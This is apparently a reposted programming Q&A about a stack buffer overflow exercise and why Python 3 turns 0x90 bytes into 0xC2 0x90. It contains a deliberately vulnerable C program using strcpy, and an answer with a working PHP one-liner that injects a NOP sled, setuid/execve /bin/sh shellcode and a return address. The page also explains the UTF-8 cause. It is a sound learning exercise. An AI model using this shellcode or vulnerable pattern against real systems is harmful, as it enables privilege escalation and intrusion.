Why is my stack filled with 0xc2 instructions when I passed the 0x90 instruction?


Question

I have a C program to exploit buffer overflow

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* Copies attacker-controlled input into a fixed 256-byte stack buffer with
   no length check: any input longer than 256 bytes overruns buf. */
int overflow(char *input) {
  char buf[256];
  strcpy(buf, input);
  return 1;
}

int main(int argc, char *argv[]) {
  overflow(argv[1]);
  printf("meow =^..^=\n");
  return 1;
}

I try to fill my stack with 0x90 instructions. For that, I use the following command and inspect with GDB:

./vuln $(python -c 'print ("\x41" * (272 - 96 - 74 - 4) + "\x90" * 96 + "\x44" * 74 + "\x42" * 4)')
0xffffd1cc: 0x41 0x41 0x41 0x41 0x41 0xc2 0x90 0xc2
0xffffd1d4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1dc: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1e4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1ec: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1f4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2

As you can see, the stack receives the 0xc2 instruction interspersed with 0x90 (the only one I requested). I believe this comes from some protection, but I'm not sure.

Is this protection? If so, is there any way to bypass it? If not, what would it be?

Thanks for all the help.


Answer 1

Score: 0

The problem was how Python handled hex; I found an alternative by switching to PHP. Here is the implemented code:

./vuln $(php -r 'echo str_repeat("\x41", 179). str_repeat("\x90", 56) . "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" . "\xc0\xd3\xff\xff";')
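The 0xc2 bytes in the GDB dump are not a mitigation. When `python` resolves to Python 3, `print` writes a `str`, and every character above U+007F is encoded for the terminal as UTF-8: U+0090 leaves the process as the two bytes 0xC2 0x90, which is exactly the alternation the dump shows, while "\x41" stays a single byte because it is ASCII. The script below is an added example, not code from the question or the answer above, and all function names in it are my own: it reproduces the expansion, recovers the intended bytes from a dumped row, and computes how long the asker's 272-character payload really was once expanded.

```python
import sys

# Constructed sample: the first row of the GDB dump from the question, as bytes.
DUMP_ROW = bytes([0x41, 0x41, 0x41, 0x41, 0x41, 0xC2, 0x90, 0xC2])


def as_print_would_emit(payload: str) -> bytes:
    """Bytes that a Python 3 `print(payload)` sends to a UTF-8 terminal.

    A `str` holds code points, not bytes.  Code points up to U+007F encode to
    the same single byte, but U+0080..U+07FF encode to two bytes, so "\x90"
    becomes b"\xc2\x90".
    """
    return payload.encode("utf-8")


def recover_intended_bytes(dumped: bytes) -> bytes:
    """Undo the UTF-8 expansion seen in a memory dump.

    Decoding as UTF-8 gives back the original code points; re-encoding as
    Latin-1 maps each code point U+0000..U+00FF to exactly one byte.  A lead
    byte whose continuation fell outside the dumped row (the trailing 0xC2 in
    DUMP_ROW) is passed through unchanged via surrogateescape instead of
    raising.
    """
    text = dumped.decode("utf-8", errors="surrogateescape")
    return text.encode("latin-1", errors="surrogateescape")


def expanded_length(payload: str) -> int:
    """Number of bytes the target process actually receives for `payload`."""
    return len(as_print_would_emit(payload))


def write_raw(payload: bytes) -> None:
    """Write bytes unchanged by bypassing the text layer of sys.stdout."""
    sys.stdout.buffer.write(payload)


if __name__ == "__main__":
    print(as_print_would_emit("\x41" * 2 + "\x90" * 2).hex(" "))   # 41 41 c2 90 c2 90
    print(recover_intended_bytes(DUMP_ROW).hex(" "))               # 41 41 41 41 41 90 c2
    # The layout from the question: 98 x 0x41, 96 x 0x90, 74 x 0x44, 4 x 0x42.
    layout = "\x41" * (272 - 96 - 74 - 4) + "\x90" * 96 + "\x44" * 74 + "\x42" * 4
    print(len(layout), expanded_length(layout))                    # 272 368
```

Every 0x90 doubled, so the process received 368 bytes instead of 272, which is why the intended offsets no longer lined up in the dump. The PHP command in the answer sidesteps the issue because PHP string literals are plain byte strings; in Python 3 the equivalent is to build a `bytes` object and hand it to `sys.stdout.buffer.write`, as `write_raw` does.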

huangapple
  • This post was published on 6 April 2023, 23:13:48
  • When reposting, please keep this link: https://go.coder-hub.com/75951107.html